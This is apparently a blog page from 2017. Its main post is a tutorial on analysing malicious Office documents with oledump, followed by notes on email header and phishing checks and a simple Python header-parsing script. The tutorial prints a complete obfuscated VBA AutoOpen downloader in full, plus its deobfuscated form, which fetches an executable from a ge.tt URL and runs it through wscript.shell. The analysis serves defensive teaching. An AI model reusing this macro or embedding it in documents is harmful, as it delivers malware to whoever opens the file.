Sunday, 4 June 2017

Analyzing Microsoft Office Files

Use any of the below tools for analyzing office documents.

oledump.py / officeparser.py / olevba.py / pyOLEScanner.py

1. Find malicious code
2. Extract code / Deobfuscate
3. Analyze code
4. Extract host and network indicators

 Microsoft Office Binary File Format Notes
-------- -------- -------- ------- --------- --------
Structured Storage (OLE SS) defines a file system inside the binary Microsoft Office file.
Data can be “storage” (folder) and “stream” (file).
Excel stores data inside the “workbook” stream.
PowerPoint stores data inside the “PowerPoint Document” stream.
Word stores data inside various streams.

 Tools for Analyzing Microsoft Office Files
----------- ---------- ---------- ------------ -------
"OfficeMalScanner" locates shellcode and VBA macros from MS Office (DOC, XLS, and PPT) files.

"MalHost-Setup" extracts shellcode from a given offset in an MS Office file and embeds it an EXE file for further analysis. (Part of OfficeMalScanner).

"Offvis" shows raw contents and structure of an MS Office file, and identifies some common exploits.

"Hachoir-urwid" can navigate through the structure of binary Office files and view stream contents.
"Office Binary Translator" converts DOC, PPT, and XLS files into Open XML files (includes BiffView tool).

"pyOLEScanner.py" can examine and decode some aspects of malicious binary Office files.
FileHex (not free) and "FileInsight" hex editors can parse and edit OLE structures.

I.

 1. Start analyzing file with # file document

 # file 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin

Output provides a lot of useful information including:

39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin: Composite Document File V2 Document (File format: CDF V2 Document)
Little Endian
Os: Windows,
Version 6.1,
Code page: 1252,
Author: Admin,
Name of Creating Application: Microsoft Office Word,
Total Editing Time: 01:47:00, Create Time/Date: Tue Jan 13 00:32:00 2015,
                                 Last Saved Time/Date: Thu May  7 04:22:00 2015,
Number of Pages: 1, Number of Words: 21, Number of Characters: 122, Security: 0,
                             Template: Normal, Last Saved By: Raz0r, Revision Number: 198,

 2. Next we will examine file with oledump.py 
   
oledump.py is a program to analyze OLE files (Compound File Binary Format). These files contain streams of data. oledump allows you to analyze these streams.
 
Many applications use this file format, the best known is MS Office. .doc, .xls, .ppt, … are OLE files (docx, xlsx, … is the new file format: XML inside ZIP).  

oledump has an embedded man page: run oledump.py -m to view it.

oledump.py 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin
  1:       114 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:      9602 '1Table'
  5:    137803 'Data'
  6:       539 'Macros/PROJECT'
  7:        71 'Macros/PROJECTwm'
  8: M    5258 'Macros/VBA/NewMacros'
  9: m     938 'Macros/VBA/ThisDocument'
 10:      3483 'Macros/VBA/_VBA_PROJECT'
 11:       578 'Macros/VBA/dir'
 12:      4096 'WordDocument'
remnux@remnux:~/Desktop/Malicious-files/doc$

[(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)]

  One of the cool things about oledump.py is its ability to mark streams that contain VBA code.
 
In the above output we can see two streams called NewMacros and ThisDocument. Letters M and m indicate that VBA code is present. Lowercase m means VBA contains only attributes statements (less interesting):
 
$ oledump.py -s9 -v 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
remnux@remnux:~/Desktop/Malicious-files/doc$  

Given stream can be viewed by adding -s with an object number. As we know we are dealing with the VBA code the -v option will instruct oledump.py to decompress VBA code and make it easy to read.

Let’s dump it for later comparison with other tools.
$ oledump.py -s9 -v 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin > attribute_code

 Now let’s move to the stream marked with capital M, this is usually where analysts find juicy stuff:

$ oledump.py -s8 -v 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin
Attribute VB_Name = "NewMacros"
#If VBA7 Then
    Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal JhjBjhGJHBfgjhffGggfGVgfVFGuHgHfGcV As Long, ByVal GyghGGBtgnfgdfGDFRGhojoJGBJFGhjFghJfHgh As String, ByVal tGtgfRDEVDFVUJUjhJGHJkujkuhJihuhBfgBF As String, ByVal lkaaJQQSxJfdLyE As Long, ByVal hujhBjhBfvcVcVdsswwsDswdFfgHUJFGHUJOIJJHhHjHGYYFtBVcfGGdGgDFGHuDfghuhDGhjjk As Long) As Long
#Else
    Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
     (ByVal gBfGFGHFGhRfghrtjgHJfGHJFGHjTyhjGFGVRFTRftyFtyFghDFvtRTRGfGDTR As Long, ByVal ltnbTaRjJOa6JYn As String, ByVal liCRZKNefyicowI As String, ByVal lGONydFEvaD5IuX As Long, ByVal lmRYfcuLs5uEk2Z As Long) As Long
#End If
 
Sub AutoOpen()
    Dim loyagdbd As String
    Dim hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg As String
    hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg = CurDir()
    Dim NewPath As String
    NewPath = Replace(hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg, "\Desktop", "\AppData\Roaming")
    NewPath = "C:\Users\Public\Documents"
    Dim CheckNumbers As String
    CheckNumbers = ""
    Dim hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg As String
    Dim NewString As String
    NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
    Dim LotsofFuckingStringinallinOne As String
    LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
    Dim AnotherShitisHereSaysthis As String
    AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
    Dim FinalWord As String
    FinalWord = CheckNumbers + Split(LotsofFuckingStringinallinOne)(4) + CheckNumbers + Split(AnotherShitisHereSaysthis)(4)
    hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg = Split(AnotherShitisHereSaysthis)(0) & Split(NewString)(3)
    iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv = "http://ge" & "." & "tt/api/1/files/2gmBurF2/0/blob?download" + CheckNumbers
    Dim IsProgramRegistered As String: IsProgramRegistered = FinalWord & Split(LotsofFuckingStringinallinOne)(6)
    ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV = CheckNumbers + CheckNumbers + CheckNumbers + "" + CheckNumbers + CheckNumbers
    lkFjuexVzhTjcrT = ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV & iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv & ""
    iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG = lkFjuexVzhTjcrT
    OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb = NewPath & Split(LotsofFuckingStringinallinOne)(1) & hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg + CheckNumbers
    lRoosrSIPgRZZm4 = OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb
    lFA9cYQDsQOBIWU = ProudtoBecomeaNepaliReverseEngineer(0, CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG & CheckNumbers & CheckNumbers & CheckNumbers, CheckNumbers & CheckNumbers & CheckNumbers & OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb & CheckNumbers & CheckNumbers, 0, 0)
     
   If Dir(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb) <> "" Then
   Dim oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh As Object
   Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = CreateObject(IsProgramRegistered & Split(AnotherShitisHereSaysthis)(3))
   Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh.exec(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb)
   End If
End Sub

 It is safe to say we found our malicious code! We will dump the code for further analysis.

$ oledump.py -s8 -v 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin > malicious-code

Before we will jump into deobfuscation and code analysis check how above tools cope with the same malicious file.
[ in software development, obfuscation is the deliberate act of creating source or machine code that is difficult for humans to understand. Like obfuscation in natural language, it may use needlessly roundabout expressions to compose statements.”]

https://www.upwork.com/hiring/development/understanding-obfuscated-code-deobfuscate-php-javascript/


II.

1. Deobfuscation / Code deobfuscation

Unfortunately neither of the tools is able to deobfuscate the code it would be too easy! So far we researched different methods of finding and extracting malicious code from OLE documents. It is high time to deobfuscate this,

There is never a “one fits all” solution to deobfuscate code. Good thing to start with is to clean up the code from randomly generated variable names. For this just open the code in any text editor and use “find and replace” feature to replace randomly named variables into something more readable.

I like to rename variables so they start with capital letter informing me about the variable type, for instance:

S_var1 means this variable is of a String type.

This is how code looks like after initial clean up:

  Attribute VB_Name = "NewMacros"
#If VBA7 Then
    Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal L_var1 As Long, ByVal S_var1 As String, ByVal S_var2 As String, ByVal L_var2 As Long, ByVal L_var3 As Long) As Long
#Else
    Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
     (ByVal L_var4 As Long, ByVal S_var3 As String, ByVal S_var4 As String, ByVal L_var5 As Long, ByVal L_var6 As Long) As Long
#End If

Sub AutoOpen()
    Dim S_var5 As String
    Dim S_var6 As String
    S_var6 = CurDir()
    Dim NewPath As String
    NewPath = Replace(S_var6, "\Desktop", "\AppData\Roaming")
    NewPath = "C:\Users\Public\Documents"
    Dim CheckNumbers As String
    CheckNumbers = ""
    Dim S_var7 As String
    Dim NewString As String
    NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
    Dim LotsofFuckingStringinallinOne As String
    LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
    Dim AnotherShitisHereSaysthis As String
    AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
    Dim FinalWord As String
    FinalWord = CheckNumbers + Split(LotsofFuckingStringinallinOne)(4) + CheckNumbers + Split(AnotherShitisHereSaysthis)(4)
    S_var7 = Split(AnotherShitisHereSaysthis)(0) & Split(NewString)(3)
    S_var8 = "http://ge" & "." & "tt/api/1/files/2gmBurF2/0/blob?download" + CheckNumbers
    Dim IsProgramRegistered As String: IsProgramRegistered = FinalWord & Split(LotsofFuckingStringinallinOne)(6)
    S_var9 = CheckNumbers + CheckNumbers + CheckNumbers + "" + CheckNumbers + CheckNumbers
    S_var10 = S_var9 & S_var8 & ""
    S_var11 = S_var10
    S_var12 = NewPath & Split(LotsofFuckingStringinallinOne)(1) & S_var7 + CheckNumbers
    S_var13 = S_var12
    S_var14 = ProudtoBecomeaNepaliReverseEngineer(0, CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + S_var11 & CheckNumbers & CheckNumbers & CheckNumbers, CheckNumbers & CheckNumbers & CheckNumbers & S_var12 & CheckNumbers & CheckNumbers, 0, 0)

   If Dir(S_var12) <> "" Then
   Dim O_var1 As Object
   Set O_var1 = CreateObject(IsProgramRegistered & Split(AnotherShitisHereSaysthis)(3))
   Set O_var1 = O_var1.exec(S_var12)
   End If
End Sub

  After a few operations code becomes much more readable:-
 
  Attribute VB_Name = "NewMacros"
#If VBA7 Then
    Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal L_var1 As Long, ByVal S_var1 As String, ByVal S_var2 As String, ByVal L_var2 As Long, ByVal L_var3 As Long) As Long
#Else
    Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
     (ByVal L_var4 As Long, ByVal S_var3 As String, ByVal S_var4 As String, ByVal L_var5 As Long, ByVal L_var6 As Long) As Long
#End If

Sub AutoOpen()
    Dim S_var5 As String
    Dim S_var6 As String
    S_var6 = CurDir()
    Dim NewPath As String
    NewPath = Replace(S_var6, "\Desktop", "\AppData\Roaming")
    NewPath = "C:\Users\Public\Documents"
    Dim CheckNumbers As String
    CheckNumbers = ""
    Dim S_var7 As String
    Dim NewString As String
    NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
    Dim LotsofFuckingStringinallinOne As String
    LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
    Dim AnotherShitisHereSaysthis As String
    AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
    Dim FinalWord As String
    FinalWord = "wscript."
    S_var7 = "SbieCtrl".exe"
    S_var8 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download"
    Dim IsProgramRegistered As String: IsProgramRegistered = "wscripts"
    S_var9 = ""
    S_var10 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download"
    S_var11 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download"
    S_var12 = "C:\Users\Public\Documents\SbieCtrl.exe"
    S_var13 = "C:\Users\Public\Documents\SbieCtrl.exe"
    S_var14 = ProudtoBecomeaNepaliReverseEngineer(0,"http://ge.tt/api/1/files/2gmBurF2/0/blob?download","C:\Users\Public\Documents\SbieCtrl.exe", 0, 0)
     
   If Dir(S_var12) <> "" Then
   Dim O_var1 As Object
   Set O_var1 = CreateObject("wscript.shell")
   Set O_var1 = O_var1.exec("C:\Users\Public\Documents\SbieCtrl.exe")
   End If
End Sub

Code analysis summary:

AutoOpen() will be executed after the document is opened.

ProudtoBecomeNepaliReverseEngineer is just an alias to URLDownloadToFile()

URLDownloadToFile() accepts five parameters, including URL address
     http://ge.tt/api/1/files/2gmBurF2/0/blob?download and a file name C:\Users\Public\Documents\SbieCtrl.exe.

Both information serve as a network and host indicators that might be used to check for successful compromise.

Spam and Phishing Analysis

         Email Header Analysis

X-Originating-IP: [Ip addres from where this mail is coming from]
 Here if the mail is passing through different mail server, them we have different X-Originating IP's in the header. But first one in the list is from where it is originated and passed through other mail server's.

Date: This shows the date and time the email message was composed.

From: This displays who the message is from, however, this can be easily forged and can be the least reliable.

Reply-To: The email address for return mail.

To: This shows to whom the message was addressed, but may not contain the recipient's address.

Subject: This is what the sender placed as a topic of the email content.

X-Spam-Flag: YES ----- It is flagged as spam and will go to spam folder, some time
                                             it may be flag as Phish etc etc.

X-SpamInfo: spam detected heuristically.

Return-path : Some times we can see different return path address instead of sender.  The email address for return mail. This is the same as "Reply-To:".

Here if sender_mail_id(From:) is spoofed, then From: and Reply-To: are different.It has to be same if it is genuine.

Here From: field they can spoof, so when you are checking check for Reply-To: field so we can know to whom mail will go if we reply.

Message-ID: we can search in our email protecting tool to how many user's this particular mail is delivered.

Envelope-To : This header shows that this email was delivered to the mailbox of a subscriber whose email address is user@example.com.

Delivery Date : This shows the date and time at which the email was received by your (mt) service or email client.

Received : The received is the most important part of the email header and is usually the most reliable. They form a list of all the servers/computers through which the message traveled in order to reach you. The received lines are best read from bottom to top. That is, the first "Received:" line is your own system or mail server. The last "Received:" line is where the mail originated. Each mail system has their own style of "Received:" line. A "Received:" line typically identifies the machine that received the mail and the machine from which the mail was received.

If there is any links in the mail it will show in header separately and we can check the url reputation in VT, urlquery. In header original URL it will show. But in mail it may be different URL. (This may be depend how you / email security solution providers configure your mail service).

Check this script for easy analysis of above details from an email header,
   http://ctechz.blogspot.in/2017/06/python-script-for-email-header-analysis.html

            How you can check against Spam and Phishing attacks

Email AddressConfirm the sender's e-mail address
                           •Do you know the person or entity?
                           •Are there any misspellings or unusual domains in the address
Links:  Confirm the links are to reputable or known websites
                •Is it recognizable—not a random IP address?​
                •Does it include "https"—indicating it’s a secure site?
Even if the link pointing towards a https:// url then also check to whome that certificate is issued. Because Authority will not issue same certificate to different users. So check for certificate abuse.

            https://textslashplain.com/2017/01/16/certified-malice/

Attachments:  Think carefully about opening an attachment from an unknown sender. Is the attachment safe to open? If you open an attachment with macros (for example, file extensions ending with “m”), your device may be infected with a virus or malware, which can compromise sensitive information.

ContentClosely review the content
       •Does it include unusual requests for sensitive information or unrealistic offers?
       •Does it have spelling and grammatical errors?​
       •Does it include inconsistent formatting and images?​
       •Does the message instruct you to break protocol or follow a different process 
           or procedure than you are used to?

Email Header Analysis:  
        https://ctechz.blogspot.in/2017/06/python-script-for-email-header-analysis.html

Report PhishingUse the Report Phishing button to report suspicious e-mails to 
 respective team. Or Send the mail to the respective team as an attachment.

Friday, 2 June 2017

Python Script for Email Header Analysis

# Python Script for Analyzing Email Headers, which helps to identify spam and
    spoofed mails
# Save the script as emailanalysis.py
# Copy Mail header in a file and give it as this script's input

import re
def matchre(data,*args):
    for regstr in args:
        matchObj = re.search( regstr+'.*', data, re.M|re.I)
        if matchObj:
            print matchObj.group(0).lstrip().rstrip()
        else:
            print "No ",regstr,"found"
print
print("Email Header Analysis by Jeffin")
print
filename= raw_input("Enter path for email header file: ");
print
fo = open(filename, "r") #fo=filehandle
data=fo.read()

matchre(data,"From:")
print
matchre(data,"Subject:")
print
matchre(data,"Date:")
print
matchre(data,"To:")
print
#matchre(data,"delivered-to:")
#print

matchre(data,"X-Originating-IP:")
print
matchre(data,"Reply-To:")
print
matchre(data,"Return-path:")
print
matchre(data,"X-Spam-Flag:")
print
matchre(data,"MIME-version:")
print
matchre(data,"Message-ID:")
print

fo.close()

#Envelope-To: user@example.com
#Delivery-Date:
#X-Spam-Status: